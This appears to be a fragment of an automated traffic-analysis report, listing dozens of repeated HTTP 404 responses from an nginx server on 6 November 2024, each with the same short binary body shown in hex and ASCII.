        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:39:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
